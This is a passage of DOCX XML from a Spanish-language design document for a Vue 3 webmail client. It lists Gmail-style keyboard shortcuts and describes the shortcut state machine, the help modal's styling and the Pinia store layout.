            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir a Enviados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Navega a la carpeta de mensajes enviados</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">g</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir a Borradores</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Navega a la carpeta de drafts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">g</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir a Calendario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cambia al módulo de calendario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">g</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">t</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir a Papelera</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Navega a la papelera</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">g</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir a Todos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Muestra todos los mensajes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Componer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abre ventana de nuevo mensaje</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Responde al mensaje seleccionado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Responder a todos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reply-all al hilo activo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reenviar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Forward del mensaje seleccionado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Buscar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enfoca la barra de búsqueda global</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Archivar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mueve el email a la carpeta de archivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Eliminar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mueve el email a la papelera</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Spam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Marca el email como spam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">u</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir arriba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Selecciona el mensaje anterior en la lista</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">j</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir abajo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Selecciona el mensaje siguiente en la lista</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">k</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ir arriba (alt)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Alias de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">u</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, compatible con Gmail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Siguiente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abre el siguiente mensaje en el reading pane</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Anterior</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abre el mensaje anterior en el reading pane</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">o</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">o</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Enter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abrir</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abre el mensaje seleccionado en reading pane</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Silenciar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Archiva y silencia notificaciones del hilo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mover a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abre diálogo para seleccionar carpeta destino</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">l</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Etiquetar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abre diálogo para añadir/quitar etiquetas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estrella</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Marca/desmarca con estrella el mensaje seleccionado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ayuda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Muestra modal con referencia de todos los atajos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Esc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cerrar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cierra modal, composer, o deselecciona mensajes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La implementación del composable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">useKeyboardShortcuts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">utiliza una máquina de estados simple con dos modos:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IDLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(esperando atajo directo) y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GOTO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la tecla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">g</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fue presionada, esperando segunda tecla). El timeout entre teclas de secuencia es de 1,500ms; si no se presiona una segunda tecla válida, el estado vuelve a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IDLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El sistema detecta automáticamente el contexto activo (lista de emails, reading pane, composer, calendario) y ejecuta solo los atajos válidos para ese contexto. Por ejemplo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para reply solo funciona cuando hay un mensaje seleccionado en el reading pane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El modal de ayuda (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) muestra una tabla organizada por categorías —Navegación, Acción, Selección— con las teclas destacadas en badges de estilo teclado (fondo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#F1F3F4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, borde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#DADCE0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sombra inferior 2px, radio 4px, fuente monospace 13px). El modal se cierra con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Esc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o clic en el backdrop.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El estado de selección de mensajes se mantiene en la store de Pinia (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">emailStore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), que utiliza la arquitectura modular recomendada para aplicaciones Vue 3: auth, emails, folders, drafts, y settings como stores separadas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[99]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[105]</w:t>
      </w:r>
      <w:r>
